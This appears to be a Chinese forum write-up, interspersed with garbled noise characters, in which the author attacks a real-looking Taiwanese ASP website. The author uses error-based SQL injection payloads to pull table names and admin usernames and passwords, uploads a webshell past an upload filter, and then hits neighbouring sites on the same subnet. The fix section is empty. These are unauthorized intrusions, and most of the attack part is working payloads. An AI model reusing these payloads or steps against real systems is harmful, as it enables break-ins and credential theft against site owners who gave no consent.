发现一个注入点
3 c+ H2 d, j9 V) M* Phttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
( m$ n- T, b" V7 \
* r& ]9 ~8 o; n7 f习惯性的加’having1=1--
" d. N `: o$ a) P) E2 L2 m
9 Y6 m2 Z6 U1 c: Chttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—$ q4 B; H3 ] H" Z9 p5 |! D5 G
# K3 }. i" `; K+ C% K: B, S0" _9 `& |. o. I% m& V2 H
7 `4 c# |' a5 L爆出Diary_A.dl_Title(这时候很激动啊)0 K- d, _# D6 t3 U
/ I K8 I* V& L& T* {) z
那么继续
3 b. B% f0 G, h. m6 ~. chttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
9 \8 N, }5 ~1 [. f$ R* z# G( N1 N; t( f" P
继续,一直爆下去
$ S3 o6 ]) O( r: m7 z; |8 @' u1 r; x2 r& K
爆到几个字段和表段 但是没找到需要的管理用户的字段4 _9 L" _& ]+ p, B3 l/ G( }7 C
0 Z! x. K; ]" p
蛋疼了 怎么办 然后去后台登陆页看源码8 J7 T! w& g7 X$ r1 X+ y
. r. l; c4 E5 g1 M
0
: m C4 C% f+ J) z8 R& Y
6 {5 a5 Y( n9 O9 j' P* |& U7 OInput name= “ADUID”
1 u( [. V1 ^) `: o+ j5 x$ @5 fInput name= “ADPWD” F3 o) t8 F/ y% |/ D
5 s( i9 e! ?% U7 L8 M! k8 V
很幸运 找到了字段那就继续
/ _. m- C Q5 K7 K找到之后开始爆用户
+ H3 x1 W7 R0 b7 s9 T. Shttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
5 V% D- c* c' P4 F爆密码/ K( e! z# q% O! t
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
# ~( v3 R) z4 G9 N# K; b测试了下 这个注入点只能爆到文章哪里的表 2 n' q1 n: W1 [
7 b- j% L, S: A7 c( R6 Y头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
+ h5 T! J' K/ n- E) M" n1 S' p1 q8 W* ]$ k" \
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了' _. { ~7 ^, _' P, r! R9 {
$ [$ E6 Q1 Z! p0 W( f J0 `& v473) w& o& \4 Q& R' l3 B% M4 | f( @
) ]0 r6 p4 w" P1 x
进后台
3 H4 F& A; j; A8 l
3 A' ?3 v# @8 l, U: r. u4 q4 `! O; _7 m9 V8 {* _$ `5 o# J
发现几个上传点 有的地方不能上传 而且防止恶意代码- i4 f$ \! V2 c; ^! ^# E( e8 i
* m4 ]1 U b) {; k7 X. a
没办法 各种百度各种找大牛 找到一只好像可以突破的马
" o. c; s$ ?5 P" j$ S
1 K5 i3 p. O% O0 f5 r
a5 r1 \" \( x' ?! X [在系统管理那里直接上传 不过没有显示地址
/ Y& K% n. m4 j! }6 B/ P2 u7 X: v$ S2 B/ \
再上传一次 抓包 搞定OK
$ n& P5 `4 Z2 p- b. R- E! O: u% z$ Q7 q1 \
2 _- X, R! u. S3 T4 i' f& x( W7 u5 k
- s3 `* n$ E X5 R+ P0 e2 u8 `472. ~, k% P2 C% U" l- s1 M* q2 O
0 @6 N) ^: g" a/ `8 y- d
晚上不行了 去睡觉。。。3 R5 c( i' q; J, d
第二天刚起床 闲的没事做继续日站吧
$ {! V- Q# g* F+ r5 \1 u5 i
! d0 k1 M. _8 U找个站 就把这个站的旁c扫了下 h: o4 _& M' e' n3 K: X) E0 S
& r9 ~. S s" \% k发现c段也有一个购物站 ,然后还和这个站的模板差不多: g" J l, J7 c
* \# P! M; T3 t$ }+ u$ B! G就找到会员登录口测试
6 H3 R/ C! l* B6 i5 @: r; L: n" d3 z7 G _
'and (select top 1 MGR_UID from A_MGR)>0—+ q# k7 U W& B9 I! E, h8 ]* e
果断爆到了 这时候我很激动 通杀 G w: z# t' p
?" ~5 y2 j+ B; ~8 b( n再次翻c段/ d2 m z8 Y1 I
; S2 ~4 j' ~: z, h6 b1 I/ `翻出几个站 都成功拿下
1 w# r1 r8 k/ D6 ]/ l" Z* l! ~, {
% V8 K( [( h4 T
- r* ~( c% |1 d; i, e) B( I; v) B2 J3 I) Y7 e
修复方案:
% C; F( u( e9 B1 _他们比我专业
1 e. m9 \% b( d) q' ^, I: Q
' ]% ~4 @ ]3 x9 H1 \3 a6 Z: b Q- g- Q
+ M+ F6 i- @" E+ X: W$ F7 w, U
|